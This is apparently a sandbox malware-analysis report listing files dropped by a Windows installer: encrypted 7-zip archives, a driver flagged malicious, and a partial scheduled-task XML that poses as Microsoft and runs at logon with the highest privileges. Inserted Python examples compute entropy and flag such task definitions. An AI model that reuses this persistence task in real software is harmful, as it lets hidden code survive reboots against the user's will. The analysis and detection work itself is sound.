                                    Preview:7z..'....O; ........2.......D.X..Z.2..7nf..R..s# s..v.f.....%G..>..9..Jh.-j.r..q.2.=v..Q.....SW7....im..|.c...&...,.s....f.h...C.g~..f.7=9...,...sd....iD......cR.^...$..<....nd...S.O..E)0..SQ.AA.C..$.D.|. a.:..5.....b.....2......W.....Z.pS.b/.F.;|`...O/....@.......4.".b.(...4...,..h/.K$..r!...."..`.S...D?.":...n..f.{C..t..,/.S.0.N..M...v...(.Yn..-.)..-...N~....}..).. .j!...1H.7?R..X.....rKi....9.i[k..+.....Br\.=.k.t8...6Lmh.../.V^K.f.......*.@MM..`...,W.......E..v.H....0.W..~....I.....w....<....X.Azl.FH..6\.a..E?=..I.q.5...s...;.,J.0..J.../.w..,..n.EkN..,j....f.y&q.C}fnY..2\......0.....N!.J..H.H0.....BJ.Q..v}=......^c.'w..#...d.T1....#...2s}N.....2.%.?. ....l.).....a<5Y.s....}...2*.#s..]0h..._G....3].....7y.}.B.6...ywE....'q.....h..?p .#..Emm2..F..| .M.Rv!.v.G....1L.Kx...T...".a6.%S0..g..7.......J.vjO.{.A....B@.c.y>}.....N.+....:.L=[....._.....Y.{....F..|.w.oX..t&[.....a\.M..2.Qe.[}L.Ch[...G.S#.$9...8<..W.d1...*PH.`.....4.A.......?..g.
                                    Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):31890
                                    Entropy (8bit):7.99402458740637
                                    Encrypted:true
                                    SSDEEP:768:rzwmoD5r754TWCxhazPt9GNgRYpSj3PsQ4yVb595nQ/:vwmolXaT9abVzP1TC
                                    MD5:8622FC7228777F64A47BD6C61478ADD9
                                    SHA1:9A7C15F341835F83C96DA804DC1E21FDA696BB56
                                    SHA-256:4E5C193D58B43630E16B6E86C7E4382B26C9A812D6D28905DD39BC7155FEBEE1
                                    SHA-512:71F31079B6C3CE72BC7238560B2CBD012A0285B6A5AC162B18EAE61A059DD3B8DBCF465225E1FB099A1E23ED7BDDF0AAE4ED7C337A10DC20E0FEEC4BC73C5441
                                    Malicious:false
                                    Preview:.@S......................xi.\ .~.#..:}..fy?koGL^|kH.G...........x....Tg.Y.t....~^..".L.41.....R..|.....R...C.m(.M&...q.v.$..i..U.....).PY.......O.....~..p.u.Y.......{...5^q.|a.]..@DP".`Rz}...|N.uSW.......^..o...U..z...3...bH........p.......Y`..b.t.x.F^i.<.%.r.o..?w.Z..M.fI.!.a...Zsb.+.y..W...n.....;...........|.{.@Q.....#".M...4.A).#;..r...>E..]w{.-....B...........v..`...S...sY....h.Sa)...r.3.U;n8wXq.x...@^z...%8H.Zd._..f~.....u[..q$..%......C..../].rS.....".=..<o.<S....-^"..iIX..r...D.......k.P.e...U..n.]^p..pal....E.c..+..Gc..U?s.R...p...:>..v..o2..B.Hn..q...F..3.o...%.......C......*.V..|..2.J..i.r....|;T.C6).......a..~"K....Y.....]3.{{..N...X>.1.....:?....,..T+=s...............so.;....&....Q.\K..b............k,..#l...Yb...VE.g.3v.$'.H3......w.....{f..e.....PS.tQ..*.8a....5w....\8%..c.;......q.j.t0/.8s..(9....... .S...0.o.o......f*..]....U..>N....Kc/..ka.I"O-O.!./..S".IN .....%G...........x%..ZL`Sq.;.}w.`..k.....F.........Tp..}..?t..
                                    Process:C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp
                                    File Type:7-zip archive data, version 0.4
                                    Category:dropped
                                    Size (bytes):31890
                                    Entropy (8bit):7.99402458740637
                                    Encrypted:true
                                    SSDEEP:768:jh43RfBLJT55mgLMoqX3gX/i69sXCuWegxJr8qF88M:qhj+I7qCKNSegPnFM
                                    MD5:CE6034AFC63BB42F4E0D6CD897DFBCB8
                                    SHA1:49E6E67EB36FE2CCAA42234A1DBB17AA2B1C7CC0
                                    SHA-256:7B7EB1D44ED88E7C19A19CEDAA25855F6800B87EC7E76873F3EA4D6A65DAA25F
                                    SHA-512:7801FA33C19D6504FF2D84453F4BB810FD579CB0C8772871F7CC53E90B835114D0221224A1743C0F5AAE76C658807CC9B4EC3BEC2CAD4AB8C3FD03203DAA7CF0
                                    Malicious:false
                                    Preview:7z..'....oYU@|......2.........Z....f..t.#.............tb.7E..Jo.........b.I=.Y..6(..=....^..>i.^E.."q.$&8....N...p+.p. .P.z6.b,.8kdD......'...G.R.n.&5..C..H.E..So!T^n{.a#d....z.SB........Nb.........LO+B ...iV..HH.Cc*.o@|.....Yvxb^.cW....._.........m.}.(V.i.H$....R....`.M.p......A?....._..nb..D.*RT<bUV.n].....LD.qU.....U9....]...h..y!...I....&C......g`...YahZ.q4.{.....2ZRG..f.. .M....:t .........8..Eg.....o.....h.]{..........p...M...lh.@.(R.]!B.:...b78$...b.......hc...C~....I..B<.x_OB|...<. .=NZ.....z........sjJ.....*{<..L.......^...9..^d..$d..}......#.dL'~.}....M...j.(5..@.tcVm.H..-.n...D..&....<..Z...@]./7?...[..qfW..!...v...==..d..M..om~).....C..9....c<..WUV.ed.h...]....OCt(X.H<<:.9..{5j....Nh.L.$..>..D..haP..~...............}r=!.E.ng..........9+...2.g.H3Lx.Bu....]jC...q.g.g.U.4..<........)....oo.T.c_.......X.,.@...nu......D.B(~.5....x5...............4S7B..p...Uk.0-m.VM.M@.V\.o...(......".k..w....Z.([.@.MQ.i9..."W..m...N.,.
                                    Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):74960
                                    Entropy (8bit):7.99759370165655
                                    Encrypted:true
                                    SSDEEP:1536:x2PlxAOr0Y07RqyjjkFThaVNwDsKsNFBrFYek36pX4MDVuPFOnfIId+:QAOrf07RHjkFThaVGMLF3hNDcPFOn5s
                                    MD5:950338D50B95A25F494EE74E97B7B7A9
                                    SHA1:F56A5D6C40BC47869A6AE3BC5217D50EA3FC1643
                                    SHA-256:87A341B968B325090EF90DFB6D130ED0A1550A1EBDE65B1002E401F1F640854A
                                    SHA-512:9A6CC00276564DDE23D4CABA133223D31D9DDD06D8C5B398F234D5CE03774ED7B9C7D875543E945A5B3DB2851EC21332FE429A56744A9CC2157436400793FF83
                                    Malicious:false
                                    Preview:.@S........................F.T....r...z'I.N..].u.e.e..y.....<|r.:v.....J.i...L.Sv.....Nz..,..K.sI*./.d.p.'.R.....6eF....W{."J.Nt'.{E....mU_..qc.G..M..y.QF)..N..W.o.D!.-...A$.....Nc.(...~.5.9'..>...E..>.5n..s..W.A7..../..+..E.....v..^&.....V..H6..j..S`H.qAG.R.i^&....>@SYz.@......q.....\t=.HE...i..".u.Z.(y.m..3.0\..Wq9#.....iH7..TL.U..3,b........L...D..,..t(mS..06...[6.y....0-....f.N7..R......./..z.bEQ.r..n.CmB'..@......(...l..=.s........`.6.?..[mzl....K.5"..#*.>.~..._...A.%b..........PnI.T...?R~JL<.$V..-.U..}\..t/F..<..t....y(K..v..6"..'.!.*z.R....EJ0.d<v:.R&......x...2....;Tc..(..dW...7a.)...rq.....{"h.wbB..t)f..qj........~.XR.a/........l./.S......".%?.C.cL._.,k.n'....a./.z...{.]...<......._pFP..d..,......Q...[........3...Kq).rJ..8..I.)o...i'Q..=......(dq(.m../..%=.......r m.X|3.......b.~tA.......%+.T..E@..ce...%....,..x#...,....-....A...q.....r.+...?......L..%.c.... ..>.Iw......P...O)...$`.'..D1.r.....*..9;..R...VL.]..%j.....TM.4.....P.L...
                                    Process:C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp
                                    File Type:7-zip archive data, version 0.4
                                    Category:dropped
                                    Size (bytes):74960
                                    Entropy (8bit):7.997593701656546
                                    Encrypted:true
                                    SSDEEP:1536:xsn0ayGU0SfvuEykcv5ZUi4Q9POZBgfmWRDOs2XwV1NN4+8wbr82nR+2R:xY0ntfvwkcv5ZwYPCBgfmW/VDS+FbrLN
                                    MD5:059BA7C31F3E227356CA5F29E4AA2508
                                    SHA1:FA3DC96A3336903ED5E6105A197A02E618E3F634
                                    SHA-256:1CBF36AFC14ECC78E133EBEC8A6EE1C93DEA85EEC472CE0FB0B57D3E093F08CC
                                    SHA-512:E2732D3E092B0A7507653A4743E1FE7A1010A20D4973C209BA7C0B2B79F02DF3CFDB4D7CE1CBFB62AA0C3D2CDE468FC2C78558DA4FF871660355E71DC77D8219
                                    Malicious:false
                                    Preview:7z..'....G8{p$......@..........0..$D.#'7..^..G.....W.K^.IC;.k...)_...S...2..x.....?(..Rj.g.......B...C..NK.B0s..L?.$..].....$r..E.]~...~K..E..3.......t..k..J......B...4.?!..6r.Qqc.5.r...\..,A.JF.J...Vb..b...M.=^.K7..e..]...X.%^3T...D.y..e2..>...k...\...S.C....')......hhV..K...z4..$d....a[.....6.&.D.:.=^.8.M[....n..i[....]..Y.4...NpkjU..;..W5.#.p.8?u....!.......u.[?.$..^.}f.A..G.N...b7.*...!!.(.....Gc..........Dg....Z.*.#.\".e.m.).t.5..r...6"....Q......fx..W......k..K7^."C.4*Z.{.^WG.....Z..P......Z....7R.....5hy...s....b.....7.V.....k.=.y.i.i......Y.......FY$.|T.5..V...E|...q.........].}bl...y.....;...q....-a..RP3..L~k....|..p_......."......rJz."..v......Z....l1.O.N...Di...O.:m.X...W.......x..}..>ktk.,.~...n-.m..`...G......$.....].lPx..<..9.m4.n...d....G...{'.a........u).R.+.....y.`.p...1@..!..b...J.W..Vt,......h...k....W.,..@Sd.<ZG......}&.R.]p(Y...o...r.4m:.J`.U..S5.iN...^!Y..hHP.B.58....JvB.K.k;...4........\.6=&erz..2..&...Z.C...h_.
                                    Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):29730
                                    Entropy (8bit):7.994290657653607
                                    Encrypted:true
                                    SSDEEP:768:e7fyvDZi63BuPi2zBBMqUp6fJzwyQb91SPlssLK4:AfKNiG/2vMx6fJzwVb2tss7
                                    MD5:2C3E0D1FB580A8F0855355CC7D8D4F7A
                                    SHA1:177E4A0B7C4BC8ACE0F46127398808E669222515
                                    SHA-256:9818FEBDE34D7E9900EB1C7A32983CA60C676BE941E2BC1ED9FBD5A187C6F544
                                    SHA-512:B9410FC8F5BE02130D50E7389F9A334DD2F2A47694E88FBB9FB4561BD3296F894369B279546EEBB376452DF795C39D87A67C6EE84C362F47FA19CF4C79E5574E
                                    Malicious:false
                                    Preview:.@S....*z.p,..................kcn..a.^.<..=......7`....6..!`...W.,2u...K.r.1.......1...g<wkw.....q..VfaR...n.h.0b[.h.V$..7.7'd.....T.....`.....)k.....}..........bW'.t..@*.%e5....#.6.g.R.......,W....._..G.d...1..e/...e7....E.....b....#Z,#...@.J.j?....q.ZR.c.b.V....Y-.......3..&E...a.2vg$..z...M9.[......_.1U....A...L.0+3U.[)8...D........5......[..-.u...ib...[..I-....#|j..d..D.S.'.....J.`.....b..y...Iu.D.....2.r}.4....<K.%....0X..X[5.sD...Xh.(G...Z;.."..o..%.......,.y..\..M6.+,.]c..t.:.|...p%.../1%.{>..r..B..yA.......}.`.#.X....Rl`.6\~k.P8..C....V\^..2.7...... h. .>....}..u)..4..w..............^N...@.v....d.P...........IA.. G?..YJ>._La..Y.@.8N.a...BK.....x.T....u.....\x.t...~.2p.M..+.R&w.......7c!v.@..RGf.F.>^+.b=........@l.T5.:........#}.%>.-.C.[XR.TG.\..'....MH..x..Y...cL........y.>....%...:.S.W^..k.EE.5O`.6<5-kh_...."95..:p....P.jk`....b.7.Z.8Y....H(j2y..`d.q;RyZ.5$..3.;......0,......+O.....L.,..u.s....S.1o.g...l"..e.....Cy<....I.+..B@......~.0...<.
                                    Process:C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp
                                    File Type:7-zip archive data, version 0.4
                                    Category:dropped
                                    Size (bytes):29730
                                    Entropy (8bit):7.994290657653608
                                    Encrypted:true
                                    SSDEEP:768:0AnbQm4/4qQyDC44LY4VfQ8aN/DObt1dSt3OUqZNKME:0ab6c4oY0aBDObjot+Uqu7
                                    MD5:A9C8A3E00692F79E1BA9693003F85D18
                                    SHA1:5ED62E15A8AC5D49FD29EF2A8DC05D24B2E0FC1F
                                    SHA-256:B88E3170EC6660651AF1606375F033F42D3680E4365863675D0E81866E086CC3
                                    SHA-512:8354B80622A9808606F1751A53F865C341FF2CE1581B489B50B1181DAA9B2C0A919F94137F47898A4529ECCCD96C43FCCD30BCDF6220FA4017235053AF0B477D
                                    Malicious:false
                                    Preview:7z..'....G..s......2......../.....h..f...H=...v.:..Q.I..OP.....p..qfX.M.J..).9;...sp......ns./..;w....3.<..m..M.L...k..L..h[-Dnt.*'5....M(w%...HVL..F&......a...R.........SF.2....m@X&X5.!....ER......]xm.....\.....=.q.I.}v.l#.B........:.e....b6.l.d..O......H.C..$.',.B..Q\..\.B.%...g...3?.....*.XuE.J.6`.../...W.../......b..HL?...E.V[...^.~.&..I,..xUH..2V..H..$..;.....c.6.o........g.}.u:.X....9...|Ynic.*.....ooK..>..M~yb..0W....^..J(S......Q?...#.i.1..#.._.9..2E.S7c.....{..'...j.A.p......dS]......i.!..YS...%.Q<..\.0.....FNw....e...2...$..$4..Pv.R...mv...-.b.T.)..r*..!..).n4.+.l[.N...4qN....w.B..[......<U.etA.A....SB..^y.......^0.f._.&..Z.zV.%.R.f_dz.,E..JJ..%.R.7.3m.:..;.`...AoHLHC..|..)f...C....$...E....H"x..F....wW...3"......Y.*Y.....5....,E...tn.KS...2......w\Z..1.".O.=+..A...2.....A.........k. c..../2..i!q..q...u.'.m.6.j.\.....x...S....$....*.&(.).^..f.d.g"j..#^....W.]{.C.?2Z.'X...5.._@..q.j..Xb...n{1..<.i...'r...7'.F.L\(.8
                                    Process:C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp
                                    File Type:7-zip archive data, version 0.4
                                    Category:dropped
                                    Size (bytes):2816881
                                    Entropy (8bit):7.999933043989351
                                    Encrypted:true
                                    SSDEEP:49152:yOsCcDPovazTSEONhiY3EB9Zw/rZjzW6LmjZhhBozUrI/KlN7qA1L6sXVq2:yOsnDP9TSEODiY0B9ZwjE79hvoo0/JsP
                                    MD5:F1ED3F0D0E4DF9EE652ED629BD74AE2C
                                    SHA1:E785AE1A0837E94A1F4E47D3056C0A0575226103
                                    SHA-256:B8DD3357EEEE78BE9BBDFD2BEEC42FDDCC49B540702A0E070A488822794D6418
                                    SHA-512:8C661532115DC86038EC1DE26D30E79125390F3D4E01FF516239E51EB2776E5FF739C790A6DA113AAD4BCEE72972EA0AC7C016D60FC55AE9A0B1B460624851D2
                                    Malicious:false
                                    Preview:7z..'.........*.....A.......Ntcz..o..N.2.+.Uc.(b.i.}...g......].a.*..(.D.P..|.....9N!g.C(.*......6[c.&...ns-.S:....8,c..).e9.@.z~f.._...2..-H..:......$.DF..|.."...v.)4d....b.I..Dn.^...H..3.q....AMN..?.j..0....X....g.|.C,.....b..j...B.6.<0.K.$.....a.@..g./_.gI..H/!"D?..N<.D..r$.8..... ........$s3...n....zY...o..A.....X+}........e{b.....qNx*..#.~.9.i.....x<..G.Aq|h....r..\.*..2H.D.c.]}..k..)+..%1.mL.J)..bT...cQ.<s.8.-._.]j.q.....7.Ww..FD..>.\..w..d7.4.w4..d997{".V...y....V..hC.....j.n.......q.......|..U.y.g%I.~.DhaA.....'.Z.~t.gg9.l#...R.i...O.J...(+.B]y\ui......St.@.".V.B..K.Z.P.f.4G.ob..m.E.6..O..3...'.'yAC.Ql......].!..'%}j..gUM:A.......0...-..WP..&j....."m...Q.NG@..d..d..p.K....(8..vh...fZr.j.q...&.O...G7..8...4$}w.w.|.'..1.C.QQ......<g:......i..^o..G.....'^....Jm[...c...Q.~.......y....n.........9,m0...<...9.............b}nx..(.TU7..O.}....T....$sd..c..[.....(."..yl.s...*......\Hw(.d.4P.((R)R....k......0.(a.5......):8...\.^...[."\F..P.....h..v
                                    Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                    File Type:PE32+ executable (native) x86-64, for MS Windows
                                    Category:dropped
                                    Size (bytes):63640
                                    Entropy (8bit):6.482810107683822
                                    Encrypted:false
                                    SSDEEP:768:4l2NchwQqrK3SBq3Xf2Zm+Oo1acHyKWkm9loSZVHT4yy5FPSFlWd/Ce34nqciC50:kgrFq3OVgUgla/4nqy5K2/zW
                                    MD5:B4EAACCE30F51EAF2A36CEA680B45A66
                                    SHA1:94493D7739C5EE7346DA31D9523404D62682B195
                                    SHA-256:15E84D040C2756B2D1B6C3F99D5A1079DC8854844D3C24D740FAFD8C668E5FB9
                                    SHA-512:16F46ABE2DD8C1A95705C397B0A5A0BC589383B60FE7C4F25503781D47160C0D68CBA0113BA918747115EF27A48AB7CA7F56CC55920F097313A2DA73343DF10B
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 9%
                                    • Antivirus: Virustotal, Detection: 6%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s.[.7.5N7.5N7.5N7.4NX.5NA'NN4.5NA'HN5.5N.|XN4.5N.|HN6.5NA'XN6.5N.|DN0.5N.|IN6.5N.|MN6.5NRich7.5N........................PE..d....(gK..........".........."............................................... ..............................................................d...(........................(.......... ................................................................................text............................... ..h.rdata..............................@..H.data...............................@....pdata..............................@..HINIT................................ ....rsrc...............................@..B.reloc..0...........................@..B................................................................................................................................................................................................................
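As an added example (not part of the Joe Sandbox report), the following Python reproduces the two columns the entries above hinge on: the 8-bit Shannon entropy behind "Entropy (8bit)" and the leading-signature check behind "File Type" (7-zip archives begin with the documented bytes `7z\xBC\xAF\x27\x1C`, DOS/PE images with `MZ`). The sample byte strings are constructed, and the entropy cut-off at which a file is called "encrypted" is an assumption; the report does not state its own threshold.

```python
import math
from collections import Counter

# Leading bytes of the two formats that appear in this dropped-file list
# (documented format signatures, not values taken from the report's previews).
MAGIC = (
    (b"7z\xbc\xaf\x27\x1c", "7-zip archive data"),
    (b"MZ", "DOS/PE executable header"),
)

# Assumed cut-off: the report does not say at which entropy it sets "Encrypted: true".
ENCRYPTED_THRESHOLD = 7.9


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte (0.0 .. 8.0), the report's 'Entropy (8bit)' column."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def identify(data: bytes) -> str:
    """Return the format name for a known leading signature, else 'data' as the report does."""
    for magic, name in MAGIC:
        if data.startswith(magic):
            return name
    return "data"


def triage(data: bytes, threshold: float = ENCRYPTED_THRESHOLD) -> dict:
    """Size, entropy, encrypted flag and file type for one blob, mirroring the report's columns."""
    ent = shannon_entropy(data)
    return {
        "size": len(data),
        "entropy": round(ent, 6),
        "encrypted": ent >= threshold,
        "file_type": identify(data),
    }


# Constructed samples (not the report's files): a 7-zip header followed by a uniform byte
# distribution, an MZ header padded with one byte value, and a run of a single byte.
SAMPLE_7Z = b"7z\xbc\xaf\x27\x1c\x00\x04" + bytes(range(256)) * 4
SAMPLE_MZ = b"MZ" + b"\x90" * 62
SAMPLE_FLAT = b"A" * 64

if __name__ == "__main__":
    for label, blob in (("7z", SAMPLE_7Z), ("mz", SAMPLE_MZ), ("flat", SAMPLE_FLAT)):
        print(label, triage(blob))
```

The uniform-distribution sample lands just under 8.0 bits per byte, which is the range the 7-zip archives and the `.@S` blobs above sit in; a packed or compressed file and an encrypted one are indistinguishable by entropy alone, which is why the signature check is kept separate from the threshold.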
                                    Process:C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp
                                    File Type:ASCII text
                                    Category:dropped
                                    Size (bytes):4096
                                    Entropy (8bit):3.3477819334971057
                                    Encrypted:false
                                    SSDEEP:48:dXKLzDln+L6w0QldOVQOj933ODOiTdKbKsz72eW+5yF:dXazDlnjwhldOVQOj6dKbKsz7
                                    MD5:925F146227EB8EB8FED35B78FFB7568D
                                    SHA1:7B70D313C0285134724718F231F68F3DEFFB79E9
                                    SHA-256:29CC7512B35855C6BC2699717A049E89521621852913893FA98B910273442FAB
                                    SHA-512:3C61A6AC158D2C600747490196D70BAE8087C7DB52257EB2A40F0D7F112E2F0EDE249C141C922B66AA811D95FC08441841D91A0E6A287874653664DAC7060F7E
                                    Malicious:false
                                    Preview:<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2005-10-11T13:21:17-08:00</Date>. <Author>Microsoft Corporation</Author>. <Version>1.0.0</Version>. <Description>Microsoft</Description>. <URI>\turminoob</URI>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user</UserId>. </LogonTrigger>. </Triggers>. <Principals>. <Principal id="System">. <UserId>user</UserId>. <RunLevel>HighestAvailable</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetw
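The task definition above is the installer's persistence mechanism: a task registered under the root path `\turminoob`, claiming Microsoft authorship, triggered at logon of the analysed user, running with `RunLevel` `HighestAvailable` and with hard termination disallowed. As an added example that is not part of the report, this Python checks an exported Task Scheduler XML for exactly those traits. The first sample is constructed from the fields visible in the preview and closed into a well-formed document; its `<Actions>` block and command path are hypothetical, since the preview is cut off before them. The second sample is a constructed benign task, to show the checks stay quiet on an ordinary Microsoft task.

```python
import xml.etree.ElementTree as ET
from typing import List

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Constructed from the fields in the report's preview; <Actions> and the command path are hypothetical.
SAMPLE_TASK_XML = r"""<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo>
    <Date>2005-10-11T13:21:17-08:00</Date>
    <Author>Microsoft Corporation</Author>
    <Version>1.0.0</Version>
    <Description>Microsoft</Description>
    <URI>\turminoob</URI>
  </RegistrationInfo>
  <Triggers>
    <LogonTrigger>
      <Enabled>true</Enabled>
      <UserId>user</UserId>
    </LogonTrigger>
  </Triggers>
  <Principals>
    <Principal id="System">
      <UserId>user</UserId>
      <RunLevel>HighestAvailable</RunLevel>
    </Principal>
  </Principals>
  <Settings>
    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>
    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
    <AllowHardTerminate>false</AllowHardTerminate>
    <StartWhenAvailable>true</StartWhenAvailable>
  </Settings>
  <Actions Context="System">
    <Exec>
      <Command>C:\Users\user\AppData\Roaming\hypothetical\payload.exe</Command>
    </Exec>
  </Actions>
</Task>
"""

# Constructed benign task (hypothetical names) for contrast.
BENIGN_TASK_XML = r"""<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><Author>Microsoft Corporation</Author><URI>\Microsoft\Windows\Hypothetical\Cleanup</URI></RegistrationInfo>
  <Triggers><CalendarTrigger><Enabled>true</Enabled></CalendarTrigger></Triggers>
  <Principals><Principal id="LocalSystem"><RunLevel>LeastPrivilege</RunLevel></Principal></Principals>
  <Settings><AllowHardTerminate>true</AllowHardTerminate></Settings>
  <Actions><Exec><Command>%SystemRoot%\System32\hypothetical.exe</Command></Exec></Actions>
</Task>
"""

# Directories an unprivileged user can write to; a scheduled action launched from one is a persistence red flag.
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\programdata\\", "\\users\\public\\")


def text(elem, path: str) -> str:
    """Text of the first child matching a namespaced path, or '' when absent."""
    node = elem.find(path, NS)
    return (node.text or "").strip() if node is not None else ""


def triage_task(xml_text: str) -> List[str]:
    """Return one finding per suspicious trait of a Task Scheduler XML document."""
    root = ET.fromstring(xml_text)
    findings = []
    author = text(root, "t:RegistrationInfo/t:Author")
    uri = text(root, "t:RegistrationInfo/t:URI")
    # Genuine Microsoft tasks live under \Microsoft\; a root-level task claiming Microsoft is masquerading.
    if "microsoft" in author.lower() and not uri.lower().startswith("\\microsoft\\"):
        findings.append(f"author claims '{author}' but task path {uri!r} is outside \\Microsoft\\")
    # <Enabled> is optional on a trigger and defaults to true.
    for trig in root.findall("t:Triggers/t:LogonTrigger", NS):
        if text(trig, "t:Enabled").lower() != "false":
            who = text(trig, "t:UserId") or "any user"
            findings.append(f"logon trigger enabled: task re-runs at every logon of {who}")
    for principal in root.findall("t:Principals/t:Principal", NS):
        if text(principal, "t:RunLevel") == "HighestAvailable":
            findings.append("RunLevel HighestAvailable: runs with the full admin token if the user has one")
    if text(root, "t:Settings/t:AllowHardTerminate").lower() == "false":
        findings.append("AllowHardTerminate false: the scheduler will not forcibly stop the task")
    for cmd in root.findall("t:Actions/t:Exec/t:Command", NS):
        path = (cmd.text or "").strip()
        if any(seg in path.lower() for seg in USER_WRITABLE):
            findings.append(f"action runs from a user-writable directory: {path}")
    return findings


if __name__ == "__main__":
    for line in triage_task(SAMPLE_TASK_XML):
        print("!", line)
    print("benign findings:", triage_task(BENIGN_TASK_XML))
```

On a live host the same text can be obtained with `schtasks /Query /TN <name> /XML` or read directly from the task store under `%SystemRoot%\System32\Tasks`, and fed to `triage_task` unchanged.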
                                    Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):2566738
                                    Entropy (8bit):7.99992559503684
                                    Encrypted:true
                                    SSDEEP:49152:ChxmtjEi7F1WpsGRApsU3euv0sSaXBNRqRNQ87FKbUOsXhiLrGb:ChAYi7FgXeKZuv9SSBNARNZ7FKbUNkab
                                    MD5:41B2FD0B3E8F7CF3438131D893FF0157
                                    SHA1:8D9B804D3E9AA5E1074921EC85CA2CC9B076E5B8
                                    SHA-256:A9C3F6D4CBABE7F6B758EDC7602BC413DB7D0DFC016827E89D6B60A2B5E4F207
                                    SHA-512:DEE2D2F7A5ABF9E20E6D9147BE9135968CC186F29A74755F6B690E55B4D91DD65902D7D1691B348E618DE72A31A140D451969CACC69E4ADF5269CD9495872857
                                    Malicious:false
                                    Preview:.8..i.&;r.....kK)MI...c....W..]....b-.a...9..z...y...~?t..u.*...P;.?.........,r..ks<......+Vva....).\Q..|'......`*c...j#.E.]..^..e..K.;UD...O...:..mM..\H.q6E&........W cb.].......GU..A..-. "....#....g.qa......bu...e..-}...........QWf..2.E.......(.:.......2b}....<.1.P......j.._;.Hz..s,.5...>.X..c..D..`>..h^ ...^.H.."..ec....2....`..$....p....M.t{..f.Z....E....M...HF.@.^.....g.B...?..gyg.5J.....4S.Yp.k.b...:-.(.z...h=.e..(..k..<4.M....Q%.wJ..\..t..gU%M./..#.....l..8/.:.....].b.6...}2...gK\.b<5.....eo%.E....I.q..].0.....]N..@.v....-1B_.p...8...I......d`.7y.S?.K?.+...p..k...E.*..../..n..k.Z[..p.0P.CUH.n....h..&...L...F..ZTV.........~...J......=. .S.....;.<.E..Q..W._.z@y.M.qW)...?....iO...t{..D_8...a....5..v-M.o.K.(`.i...o&.L+.P...A:0'.....c.V......,..LO.5/.....b{U.....!B,.TTt..j.M.`k2...Q.0.|.:.....Ia....f..e....=n....J..v.0.....7...j.o9.....p..5.l..y.=...o./........q....?...J?.4.kJsT#..e.|HM.....P..N............;P../.d.5..I..E./._...m.:..+.T.
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):64
                                    Entropy (8bit):1.1940658735648508
                                    Encrypted:false
                                    SSDEEP:3:NlllulDm0ll//Z:NllU6cl/
                                    MD5:DA1F22117B9766A1F0220503765A5BA5
                                    SHA1:D35597157EFE03AA1A88C1834DF8040B3DD3F3CB
                                    SHA-256:BD022BFCBE39B4DA088DDE302258AE375AAFD6BDA4C7B39A97D80C8F92981C69
                                    SHA-512:520FA7879AB2A00C86D9982BB057E7D5E243F7FC15A12BA1C823901DC582D2444C76534E955413B0310B9EBD043400907FD412B88927DAD07A1278D3B667E3D9
                                    Malicious:false
                                    Preview:@...e.................................R..............@..........
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
